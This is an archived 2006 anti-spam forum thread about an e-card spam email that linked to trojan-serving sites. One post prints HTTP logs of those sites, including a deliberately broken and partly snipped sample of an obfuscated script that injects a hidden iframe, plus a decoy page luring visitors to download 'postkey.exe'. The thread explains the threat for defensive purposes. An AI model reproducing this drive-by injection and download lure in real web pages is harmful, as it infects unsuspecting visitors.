dra007 Posted January 23, 2006 Share Posted January 23, 2006 This is interesting, I wonder why they are getting so desperate: the link in this spam pointed to a website that attempted to send a trojan, fortunately blocked by my antivirus program, the link pretended to be a postcard but otherwise seemed quite innocuous: http://www.spamcop.net/sc?id=z862838668ze0...e0f4d044bc5de1z Link to comment Share on other sites More sharing options...
mshalperin Posted January 23, 2006 Share Posted January 23, 2006 This is interesting, I wonder why they are getting so desperate: the link in this spam pointed to a website that attempted to send a trojan, 39595[/snapback] Why did you try the link? Link to comment Share on other sites More sharing options...
dra007 Posted January 23, 2006 Author Share Posted January 23, 2006 Why did you try the link? 39598[/snapback] Curiosity killed the cat? Link to comment Share on other sites More sharing options...
mshalperin Posted January 23, 2006 Share Posted January 23, 2006 Curiosity killed the cat? 39599[/snapback] 8 more to go. Link to comment Share on other sites More sharing options...
dra007 Posted January 23, 2006 Author Share Posted January 23, 2006 since I stopped counting am I a zombi? Link to comment Share on other sites More sharing options...
dra007 Posted January 23, 2006 Author Share Posted January 23, 2006 On a more serious note, I was hoping some savvy geek here would have some insight into this. Link to comment Share on other sites More sharing options...
Wazoo Posted January 24, 2006 Share Posted January 24, 2006 dead page .. URLs broken in the below; 01/23/06 18:11:19 Browsing http:// www.bertschphotography.com/ PhotoGallery/postcard/ Fetching http:// www.bertschphotography.com/ PhotoGallery/postcard/ ... GET /PhotoGallery/postcard/ HTTP/1.1 Host: www. bertschphotography.com Connection: close User-Agent: Sam Spade 1.14 HTTP/1.1 302 Found Date: Tue, 24 Jan 2006 00:11:24 GMT Server: Apache/1.3.34 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.11 mod_ssl/2.8.25 OpenSSL/0.9.7a Location: http://server2.hostbuilder.com/suspended.page/ Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://server2.hostbuilder.com/suspended.page/">here</A>.<P> <HR> <ADDRESS>Apache/1.3.34 Server at www.bertschphotography.com Port 80</ADDRESS> </BODY></HTML> dead page, URLs broken in the below; 01/23/06 18:14:54 Browsing http://www .euro-grafic.com/immagini/postcard/ Fetching http://www. euro-grafic.com/immagini/postcard/ ... GET /immagini/postcard/ HTTP/1.1 Host: www. euro-grafic.com Connection: close User-Agent: Sam Spade 1.14 HTTP/1.1 503 Service Temporarily Unavailable Date: Tue, 24 Jan 2006 00:11:21 GMT Server: Apache/2.0.50 (Fedora) Content-Length: 410 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>503 Service Temporarily Unavailable</title> </head><body> <h1>Service Temporarily Unavailable</h1> <p>The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.</p> <hr /> <address>Apache/2.0.50 (Fedora) Server at www. euro-grafic.com Port 80</address> </body></html> Here's your code, URLs broken in the below, and of course, code disfigured; 01/23/06 18:17:24 Browsing http://www. andsoitbegins.co.uk/acatalog/postcard/ Fetching http://www.a ndsoitbegins.co.uk/acatalog/postcard/ ... GET /acatalog/postcard/ HTTP/1.1 Host: www. andsoitbegins.co.uk Connection: close User-Agent: Sam Spade 1.14 HTTP/1.1 200 OK Date: Tue, 24 Jan 2006 00:17:30 GMT Server: Apache/1.3.29 (Unix) mod_jk/1.2.2 Sun-ONE-ASP/4.0.0 FrontPage/5.0.2.2623 mod_python/2.7.8 Python/1.5.2 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26 mod_webapp/1.2.0-dev X-Powered-By: PHP/4.1.2 Connection: close Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">'>http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <s cr ipt lang uage=jav ascr ipt>docu ment.wr ite(une scape('%3c%69%66%72%61%6d%65%20%7 3%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%<snip>67%68%74%3d%22%31%22%20%77%69%64%74%68%3d%22%3 1%22%3e%3c%2f%69%66%72%61%6d%65%3e'))</scr ipt> <!-- saved from url=(0062)http://www. bookandhost.com/us-hosting/order.asp?plan=10mblinux --> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META http-equiv=Content-Type content="text/html; charset=Windows-1252"> <CSS stiff deleted> <META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD> <BODY> <p>Loading...</p> <p>Please wait</p> <p>If not supported download this private <a href="keys/postkey.exe">key</a></p> </BODY></HTML> User running insecurely would only see the "page not found" message, not knowing that the javasript enabled browser has already downloaded and executed the code .... Let's not even try to discuss the mindset of some actually clicking on the "download this file" link .... geeze .... No idea what you really want to hear besides the obvious ... unsolicited e-mail from an unknown source, including three different links to the "same" ecard (?) .. on and on .... back to that only the ignorant would follow the links provided in an e-mail like this, and yet, we all know that there are millions of those types out there .... By the way, this is far from "new" ...... Link to comment Share on other sites More sharing options...
dra007 Posted January 24, 2006 Author Share Posted January 24, 2006 Thanks Wazoo. Not that this was the run of the mill spam. It did not sell anything, just announced an e-card... Something like you get from friends around holidays. Of course, my initial instinct was to ignore the bait and just report it, and that what I did. ... it was after I trashed that e-mail that I went back to it .. The question remains, why would someone bait you with an innocent looking e-card just to infect your machine with a trojan? And now it looks like the site was taken down... By the way, this is far from "new" ...... My luck, it was new to me... Link to comment Share on other sites More sharing options...
StevenUnderwood Posted January 24, 2006 Share Posted January 24, 2006 The question remains, why would someone bait you with an innocent looking e-card just to infect your machine with a trojan?39622[/snapback] Virus writers will use any trick to get people to run their programs, which most recently openholes in your system, allowing them control of your systems so you can help them send their spam or more virus attempts. Link to comment Share on other sites More sharing options...
Wazoo Posted January 24, 2006 Share Posted January 24, 2006 The question remains, why would someone bait you with an innocent looking e-card just to infect your machine with a trojan? 39622[/snapback] I'll offer a link in a bit. The background was that I spent almost 12 hours (from start to finish, though not totally dedicated to this specific work .. tons of time doing other stuff while waiting for scans to finish, a defrag or two, etc.) .... This was being done remotely via a VNC tool on a system about 70 miles north of me ... As time went on, getting rather perturbed that something was going on that just wasn't quite making it self visible to me. As you may have noticed, I hate it when that happens. Bottom line, I did in fact get that system cleaned up and running smooth again. Trying to say exactly what I did and what the magic step may have been, I'll never know .. way too many penciled notes, my own system froze up a time or two with all the research going on, notepad instances with snippets from here and there, documenting things seen, things done, etc. ... and of course, a lot of that data gone when having to do that forced reboot .... it was a week or so later that this web page appeared .. thankfully I hadn't read it before I blew a day on an infected system, else I'd have known it was impossible to remove <g> As I recollect, Adaware's VX2 tool didn't show up until a bit later. As I can't define which steps managed to actually identify the files involved (that kept rewriting new ones with new names every time the computer rebooted) . I'll just state that it's nice that there are much smarter folks out there in the world, just wish the reaction time was a bit quicker sometimes <g> Anyway, I believe your answer is pretty well addressed in this following 'story' ... got to give the guy a lot of credit for doing this kind of research ..... http://tacit.livejournal.com/125748.html I'd swear I put this up somewhere in here before .... seems like I would have tossed it into the FAQ ...???? Ha!! I did ... under the Other Places section; Follow the Money; or, why does my computer keep getting infested with spyware? Link to comment Share on other sites More sharing options...
dra007 Posted January 24, 2006 Author Share Posted January 24, 2006 Good story, thanks Wazoo, very instructive. Since most e-mails I get are from spammers, I will have to assume this one too was sent by someone with connections to the spammers' lists. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.